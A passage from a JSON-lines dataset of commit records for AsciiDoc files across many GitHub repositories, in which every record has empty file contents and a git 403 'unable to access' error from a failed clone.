brandonkearby\/elasticsearch,MichaelLiZhou\/elasticsearch,infusionsoft\/elasticsearch,martinstuga\/elasticsearch,wenpos\/elasticsearch,huanzhong\/elasticsearch,gingerwizard\/elasticsearch,cwurm\/elasticsearch,karthikjaps\/elasticsearch,henakamaMSFT\/elasticsearch,henakamaMSFT\/elasticsearch,caengcjd\/elasticsearch,nrkkalyan\/elasticsearch,mnylen\/elasticsearch,snikch\/elasticsearch,cnfire\/elasticsearch-1,jchampion\/elasticsearch,ulkas\/elasticsearch,AndreKR\/elasticsearch,F0lha\/elasticsearch,achow\/elasticsearch,jimczi\/elasticsearch,achow\/elasticsearch,tebriel\/elasticsearch,franklanganke\/elasticsearch,schonfeld\/elasticsearch,qwerty4030\/elasticsearch,ESamir\/elasticsearch,Stacey-Gammon\/elasticsearch,artnowo\/elasticsearch,KimTaehee\/elasticsearch,AndreKR\/elasticsearch,petabytedata\/elasticsearch,karthikjaps\/elasticsearch,PhaedrusTheGreek\/elasticsearch,myelin\/elasticsearch,obourgain\/elasticsearch,dpursehouse\/elasticsearch,jchampion\/elasticsearch,StefanGor\/elasticsearch,andrejserafim\/elasticsearch,strapdata\/elassandra,IanvsPoplicola\/elasticsearch,avikurapati\/elasticsearch,kunallimaye\/elasticsearch,davidvgalbraith\/elasticsearch,ouyangkongtong\/elasticsearch,jeteve\/elasticsearch,yanjunh\/elasticsearch,artnowo\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,wittyameta\/elasticsearch,onegambler\/elasticsearch,jchampion\/elasticsearch,gfyoung\/elasticsearch,njlawton\/elasticsearch,huanzhong\/elasticsearch,jpountz\/elasticsearch,GlenRSmith\/elasticsearch,PhaedrusTheGreek\/elasticsearch,ricardocerq\/elasticsearch,LeoYao\/elasticsearch,gmarz\/elasticsearch,weipinghe\/elasticsearch,rajanm\/elasticsearch,onegambler\/elasticsearch,sdauletau\/elasticsearch,Collaborne\/elasticsearch,glefloch\/elasticsearch,mapr\/elasticsearch,maddin2016\/elasticsearch,girirajsharma\/elasticsearch,vroyer\/elasticassandra,areek\/elasticsearch,cnfire\/elasticsearch-1,sneivandt\/elasticsearch,JervyShi\/elasticsearch,s1monw\/elasticsearch,girirajsharma\/elasticsearch,mjason3\/elasticsearch,adrianbk\/elasticsearch,ouyangkongtong\/elasticsearch,cwurm\/elasticsearch,rmuir\/elasticsearch,Charlesdong\/elasticsearch,nomoa\/elasticsearch,andrejserafim\/elasticsearch,wuranbo\/elasticsearch,rmuir\/elasticsearch,coding0011\/elasticsearch,dpursehouse\/elasticsearch,glefloch\/elasticsearch,andrejserafim\/elasticsearch,knight1128\/elasticsearch,jeteve\/elasticsearch,vietlq\/elasticsearch,kunallimaye\/elasticsearch,shreejay\/elasticsearch,fred84\/elasticsearch,petabytedata\/elasticsearch,s1monw\/elasticsearch,tebriel\/elasticsearch,mcku\/elasticsearch,wuranbo\/elasticsearch,caengcjd\/elasticsearch,winstonewert\/elasticsearch,qwerty4030\/elasticsearch,mm0\/elasticsearch,qwerty4030\/elasticsearch,girirajsharma\/elasticsearch,robin13\/elasticsearch,LewayneNaidoo\/elasticsearch,ricardocerq\/elasticsearch,MetSystem\/elasticsearch,drewr\/elasticsearch,sdauletau\/elasticsearch,kunallimaye\/elasticsearch,MichaelLiZhou\/elasticsearch,bawse\/elasticsearch,sdauletau\/elasticsearch,rhoml\/elasticsearch,markharwood\/elasticsearch,bawse\/elasticsearch,F0lha\/elasticsearch,nrkkalyan\/elasticsearch,palecur\/elasticsearch,lzo\/elasticsearch-1,YosuaMichael\/elasticsearch,mgalushka\/elasticsearch,jeteve\/elasticsearch,wuranbo\/elasticsearch,artnowo\/elasticsearch,infusionsoft\/elasticsearch,polyfractal\/elasticsearch,jeteve\/elasticsearch,vietlq\/elasticsearch,clintongormley\/elasticsearch,GlenRSmith\/elasticsearch,zkidkid\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Rygbee\/elasticsearch,LewayneNaidoo\/elasticsearch,clintongormley\/elasticsearch,camilojd\/elasticsearch,nomoa\/elasticsearch,ESamir\/elasticsearch,strapdata\/elassandra,zkidkid\/elasticsearch,Helen-Zhao\/elasticsearch,jprante\/elasticsearch,xuzha\/elasticsearch,markharwood\/elasticsearch,MetSystem\/elasticsearch,mjason3\/elasticsearch,iacdingping\/elasticsearch,mm0\/elasticsearch,MetSystem\/elasticsearch,ivansun1010\/elasticsearch,jango2015\/elasticsearch,wittyameta\/elasticsearch,AndreKR\/elasticsearch,clintongormley\/elasticsearch,i-am-Nathan\/elasticsearch,palecur\/elasticsearch,martinstuga\/elasticsearch,wittyameta\/elasticsearch,nilabhsagar\/elasticsearch,C-Bish\/elasticsearch,kalimatas\/elasticsearch,Shepard1212\/elasticsearch,MaineC\/elasticsearch,rlugojr\/elasticsearch,markharwood\/elasticsearch,uschindler\/elasticsearch,rlugojr\/elasticsearch,sreeramjayan\/elasticsearch,mbrukman\/elasticsearch,masaruh\/elasticsearch,episerver\/elasticsearch,jprante\/elasticsearch,huanzhong\/elasticsearch,strapdata\/elassandra5-rc,spiegela\/elasticsearch,LewayneNaidoo\/elasticsearch,fforbeck\/elasticsearch,wbowling\/elasticsearch,pozhidaevak\/elasticsearch,hafkensite\/elasticsearch,nomoa\/elasticsearch,Collaborne\/elasticsearch,davidvgalbraith\/elasticsearch,zkidkid\/elasticsearch,mnylen\/elasticsearch,yynil\/elasticsearch,ZTE-PaaS\/elasticsearch,Stacey-Gammon\/elasticsearch,lzo\/elasticsearch-1,Collaborne\/elasticsearch,xuzha\/elasticsearch,robin13\/elasticsearch,adrianbk\/elasticsearch,kalburgimanjunath\/elasticsearch,mcku\/elasticsearch,lks21c\/elasticsearch,markwalkom\/elasticsearch,avikurapati\/elasticsearch,huanzhong\/elasticsearch,Charlesdong\/elasticsearch,camilojd\/elasticsearch,wangtuo\/elasticsearch,jpountz\/elasticsearch,F0lha\/elasticsearch,kunallimaye\/elasticsearch,knight1128\/elasticsearch,wbowling\/elasticsearch,glefloch\/elasticsearch,yynil\/elasticsearch,YosuaMichael\/elasticsearch,lmtwga\/elasticsearch,mgalushka\/elasticsearch,ESamir\/elasticsearch,onegambler\/elasticsearch,rajanm\/elasticsearch,PhaedrusTheGreek\/elasticsearch,MetSystem\/elasticsearch,pozhidaevak\/elasticsearch,ouyangkongtong\/elasticsearch,caengcjd\/elasticsearch,sreeramjayan\/elasticsearch,huanzhong\/elasticsearch,rmuir\/elasticsearch,mnylen\/elasticsearch,JSCooke\/elasticsearch,MisterAndersen\/elasticsearch,areek\/elasticsearch,naveenhooda2000\/elasticsearch,Rygbee\/elasticsearch,scorpionvicky\/elasticsearch,a2lin\/elasticsearch,onegambler\/elasticsearch,socialrank\/elasticsearch,scorpionvicky\/elasticsearch,iacdingping\/elasticsearch,mm0\/elasticsearch,sneivandt\/elasticsearch,petabytedata\/elasticsearch,awislowski\/elasticsearch,masterweb121\/elasticsearch,lmtwga\/elasticsearch,mcku\/elasticsearch,wbowling\/elasticsearch,i-am-Nathan\/elasticsearch,MaineC\/elasticsearch,palecur\/elasticsearch,trangvh\/elasticsearch,ulkas\/elasticsearch,F0lha\/elasticsearch,davidvgalbraith\/elasticsearch,knight1128\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,infusionsoft\/elasticsearch,a2lin\/elasticsearch,mjason3\/elasticsearch,fernandozhu\/elasticsearch,geidies\/elasticsearch,hafkensite\/elasticsearch,i-am-Nathan\/elasticsearch,uschindler\/elasticsearch,shreejay\/elasticsearch,schonfeld\/elasticsearch,jeteve\/elasticsearch,nellicus\/elasticsearch,Shepard1212\/elasticsearch,awislowski\/elasticsearch,masterweb121\/elasticsearch,strapdata\/elassandra5-rc,LeoYao\/elasticsearch,nellicus\/elasticsearch,markwalkom\/elasticsearch,nilabhsagar\/elasticsearch,vroyer\/elassandra,C-Bish\/elasticsearch,gfyoung\/elasticsearch,rhoml\/elasticsearch,elasticdog\/elasticsearch,fred84\/elasticsearch,trangvh\/elasticsearch,ckclark\/elasticsearch,mbrukman\/elasticsearch,jbertouch\/elasticsearch,fred84\/elasticsearch,dpursehouse\/elasticsearch,fred84\/elasticsearch,njlawton\/elasticsearch,IanvsPoplicola\/elasticsearch,YosuaMichael\/elasticsearch,wittyameta\/elasticsearch,andrestc\/elasticsearch,gmarz\/elasticsearch,alexshadow007\/elasticsearch,nellicus\/elasticsearch,maddin2016\/elasticsearch,mm0\/elasticsearch,yanjunh\/elasticsearch,vroyer\/elassandra,markwalkom\/elasticsearch,mmaracic\/elasticsearch,umeshdangat\/elasticsearch,ZTE-PaaS\/elasticsearch,kalimatas\/elasticsearch,jeteve\/elasticsearch,spiegela\/elasticsearch,JSCooke\/elasticsearch,yanjunh\/elasticsearch,F0lha\/elasticsearch,mortonsykes\/elasticsearch,obourgain\/elasticsearch,mohit\/elasticsearch,strapdata\/elassandra5-rc,yynil\/elasticsearch,iacdingping\/elasticsearch,polyfractal\/elasticsearch,wangtuo\/elasticsearch,nilabhsagar\/elasticsearch,robin13\/elasticsearch,zkidkid\/elasticsearch,mapr\/elasticsearch,nezirus\/elasticsearch,nknize\/elasticsearch,elasticdog\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,alexshadow007\/elasticsearch,girirajsharma\/elasticsearch,weipinghe\/elasticsearch,nknize\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,kalburgimanjunath\/elasticsearch,clintongormley\/elasticsearch,KimTaehee\/elasticsearch,weipinghe\/elasticsearch,Collaborne\/elasticsearch,nezirus\/elasticsearch,diendt\/elasticsearch,wangtuo\/elasticsearch,iacdingping\/elasticsearch,vroyer\/elassandra,nellicus\/elasticsearch,ckclark\/elasticsearch,areek\/elasticsearch,MichaelLiZhou\/elasticsearch,nrkkalyan\/elasticsearch,kunallimaye\/elasticsearch,mmaracic\/elasticsearch,wbowling\/elasticsearch,winstonewert\/elasticsearch,IanvsPoplicola\/elasticsearch,petabytedata\/elasticsearch,nazarewk\/elasticsearch,dongjoon-hyun\/elasticsearch,ouyangkongtong\/elasticsearch,markharwood\/elasticsearch,alexshadow007\/elasticsearch,robin13\/elasticsearch,jpountz\/elasticsearch,wbowling\/elasticsearch,mikemccand\/elasticsearch,kalburgimanjunath\/elasticsearch,geidies\/elasticsearch,maddin2016\/elasticsearch,a2lin\/elasticsearch,infusionsoft\/elasticsearch,polyfractal\/elasticsearch,MichaelLiZhou\/elasticsearch,ricardocerq\/elasticsearch,Charlesdong\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,geidies\/elasticsearch,JackyMai\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,andrestc\/elasticsearch,adrianbk\/elasticsearch,fred84\/elasticsearch,Collaborne\/elasticsearch,MaineC\/elasticsearch,StefanGor\/elasticsearch,C-Bish\/elasticsearch,mnylen\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,ckclark\/elasticsearch,karthikjaps\/elasticsearch,dongjoon-hyun\/elasticsearch,F0lha\/elasticsearch,brandonkearby\/elasticsearch,girirajsharma\/elasticsearch,wenpos\/elasticsearch,Shepard1212\/elasticsearch,lks21c\/elasticsearch,cwurm\/elasticsearch,xingguang2013\/elasticsearch,masterweb121\/elasticsearch,kaneshin\/elasticsearch,nknize\/elasticsearch,kunallimaye\/elasticsearch,JackyMai\/elasticsearch,fernandozhu\/elasticsearch,bestwpw\/elasticsearch,mnylen\/elasticsearch,spiegela\/elasticsearch,xingguang2013\/elasticsearch,jango2015\/elasticsearch,ESamir\/elasticsearch,jango2015\/elasticsearch,dongjoon-hyun\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,umeshdangat\/elasticsearch,xingguang2013\/elasticsearch,onegambler\/elasticsearch,ulkas\/elasticsearch,andrestc\/elasticsearch,rlugojr\/elasticsearch,mgalushka\/elasticsearch,cnfire\/elasticsearch-1,strapdata\/elassandra5-rc,masaruh\/elasticsearch,jango2015\/elasticsearch,winstonewert\/elasticsearch,martinstuga\/elasticsearch,ivansun1010\/elasticsearch,liweinan0423\/elasticsearch,mbrukman\/elasticsearch,mjason3\/elasticsearch,achow\/elasticsearch,diendt\/elasticsearch,camilojd\/elasticsearch,ulkas\/elasticsearch,elancom\/elasticsearch,uschindler\/elasticsearch,MaineC\/elasticsearch,snikch\/elasticsearch,ZTE-PaaS\/elasticsearch,fernandozhu\/elasticsearch,snikch\/elasticsearch,HonzaKral\/elasticsearch,vietlq\/elasticsearch,bestwpw\/elasticsearch,HonzaKral\/elasticsearch","old_file":"docs\/plugins\/cloud-gce.asciidoc","new_file":"docs\/plugins\/cloud-gce.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b23b0ac7ec488646a942a641b3a54976117fcca6","subject":"Update 2016-07-30-Git-Lab-CI-Docker.adoc","message":"Update 2016-07-30-Git-Lab-CI-Docker.adoc","repos":"AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io","old_file":"_posts\/2016-07-30-Git-Lab-CI-Docker.adoc","new_file":"_posts\/2016-07-30-Git-Lab-CI-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AppHat\/AppHat.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da66a8c3a0d855775f8b74917183c85e7b992ce2","subject":"add mini contributor guide","message":"add mini contributor guide\n","repos":"opendevise\/bespoke-multimedia,opendevise\/bespoke-multimedia","old_file":"CONTRIBUTING-CODE.adoc","new_file":"CONTRIBUTING-CODE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opendevise\/bespoke-multimedia.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c31946f6af2d2450422b34c6f2f55828d36d912","subject":"Added documentation for the new caching functionality","message":"Added documentation for the new caching functionality\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"575aa17d7e64f1eb54e0986953609df2f499ea91","subject":"added start idea for file\/blob","message":"added start idea for file\/blob\n","repos":"totonga\/wodson,totonga\/wodson,totonga\/wodson","old_file":"feasability_study\/doc\/file.adoc","new_file":"feasability_study\/doc\/file.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/totonga\/wodson.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f975c6164dc642bc8a7aa2c107695e7bd47bbdfc","subject":"To GF 5","message":"To GF 5\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"App servers from Eclipse.adoc","new_file":"App servers from Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"778bd390a5972a9248830a3af5f54ffa2fe3a141","subject":"chore(tooling-ci): \u6587\u6cd5\u7684\u306a\u4fee\u6b63","message":"chore(tooling-ci): \u6587\u6cd5\u7684\u306a\u4fee\u6b63\n","repos":"lidasong2014\/promises-book,mzbac\/promises-book,xifeiwu\/promises-book,azu\/promises-book,mzbac\/promises-book,lidasong2014\/promises-book,charlenopires\/promises-book,tangjinzhou\/promises-book,sunfurong\/promise,dieface\/promises-book,liubin\/promises-book,wangwei1237\/promises-book,oToUC\/promises-book,azu\/promises-book,cqricky\/promises-book,sunfurong\/promise,genie88\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,genie88\/promises-book,purepennons\/promises-book,dieface\/promises-book,tangjinzhou\/promises-book,charlenopires\/promises-book,cqricky\/promises-book,xifeiwu\/promises-book,genie88\/promises-book,charlenopires\/promises-book,tangjinzhou\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,liyunsheng\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,liyunsheng\/promises-book,xifeiwu\/promises-book,azu\/promises-book,wenber\/promises-book,mzbac\/promises-book,wenber\/promises-book,liubin\/promises-book,azu\/promises-book,purepennons\/promises-book,liyunsheng\/promises-book,liubin\/promises-book,cqricky\/promises-book,purepennons\/promises-book,wenber\/promises-book,dieface\/promises-book","old_file":"Appendix-Note\/tooling-ci.adoc","new_file":"Appendix-Note\/tooling-ci.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26e00820a96a12bd27af0752abf0621e3c602f5c","subject":"y2b create post Special Announcement - UnboxTherapy.com","message":"y2b create post Special Announcement - UnboxTherapy.com","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-21-Special-Announcement--UnboxTherapycom.adoc","new_file":"_posts\/2011-03-21-Special-Announcement--UnboxTherapycom.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d6641e546f761e243ea6acd6d00fe13a005bcb5","subject":"Update 2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","message":"Update 2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","new_file":"_posts\/2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33b4ed7e7ca45c76ef98603aa369ca77eb4f985d","subject":"y2b create post You've Never Seen A Keyboard Like This...","message":"y2b create post You've Never Seen A Keyboard Like This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-25-Youve-Never-Seen-A-Keyboard-Like-This.adoc","new_file":"_posts\/2017-10-25-Youve-Never-Seen-A-Keyboard-Like-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87f267afcbf6d951606dcb9fb3a3afc14600d6c6","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97f8a5e4ca0e44128f0978340c99ccf8f1a8a9f0","subject":"Update 2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","message":"Update 2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","new_file":"_posts\/2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4802a873d84a1beb09e1b9b411d7abdbe88ec8a4","subject":"Update 2016-08-09-Removing-and-Adding-Classes-on-Javascript.adoc","message":"Update 2016-08-09-Removing-and-Adding-Classes-on-Javascript.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2016-08-09-Removing-and-Adding-Classes-on-Javascript.adoc","new_file":"_posts\/2016-08-09-Removing-and-Adding-Classes-on-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7850f378792f5be9eb10be71a669fc0b57ed640c","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17f9a85dd4c1de19b807c9486e0be2788f3b446a","subject":"Update 2017-05-24-Your-Blog-title.adoc","message":"Update 2017-05-24-Your-Blog-title.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-05-24-Your-Blog-title.adoc","new_file":"_posts\/2017-05-24-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa2053c9a57261f25042feeac435f155e2ccf112","subject":"Update 2015-10-17-Visualising-complex-systems-in-JS.adoc","message":"Update 2015-10-17-Visualising-complex-systems-in-JS.adoc","repos":"xmichaelx\/xmichaelx.github.io,xmichaelx\/xmichaelx.github.io","old_file":"_posts\/2015-10-17-Visualising-complex-systems-in-JS.adoc","new_file":"_posts\/2015-10-17-Visualising-complex-systems-in-JS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xmichaelx\/xmichaelx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e8b656e733bd976458392b830f2482e3c47fe0b","subject":"Update 2016-04-19-On-the-Subject-of-Finality.adoc","message":"Update 2016-04-19-On-the-Subject-of-Finality.adoc","repos":"reggert\/reggert.github.io,reggert\/reggert.github.io,reggert\/reggert.github.io,reggert\/reggert.github.io","old_file":"_posts\/2016-04-19-On-the-Subject-of-Finality.adoc","new_file":"_posts\/2016-04-19-On-the-Subject-of-Finality.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reggert\/reggert.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1d5fdd086c5bf2e0a177fe79a43eb18f6b0efea","subject":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","message":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25afccf6bd6950c22d57c90a686063e70d6387c3","subject":"Update 2015-12-27-Useful-links.adoc","message":"Update 2015-12-27-Useful-links.adoc","repos":"azubkov\/azubkov.github.io,azubkov\/azubkov.github.io,azubkov\/azubkov.github.io","old_file":"_posts\/2015-12-27-Useful-links.adoc","new_file":"_posts\/2015-12-27-Useful-links.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/azubkov\/azubkov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc5a949dc629c3526247a7a6e44df681448872a7","subject":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","message":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd635bcd00b3fdaf5744f706d5256d8abfbb9243","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84f7754297837fe2ded2ee3ef3953acca3c479ac","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b6e3557bfe0f901fa5351e702dd42ee149379a9","subject":"Update 2016-06-11-Como-usar-este-editor.adoc","message":"Update 2016-06-11-Como-usar-este-editor.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Como-usar-este-editor.adoc","new_file":"_posts\/2016-06-11-Como-usar-este-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c33040a72f670ce662e44496fb1d944fe34c817d","subject":"Update 2016-09-30-shortcutkey-taiouhyou.adoc","message":"Update 2016-09-30-shortcutkey-taiouhyou.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-30-shortcutkey-taiouhyou.adoc","new_file":"_posts\/2016-09-30-shortcutkey-taiouhyou.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cc74ffc03516b5a2c203c6fc9de2bd9895b82fd","subject":"Update 2016-12-02-exhibition-booth-tour.adoc","message":"Update 2016-12-02-exhibition-booth-tour.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36682d5d076836706962d84a87f03eba87196948","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 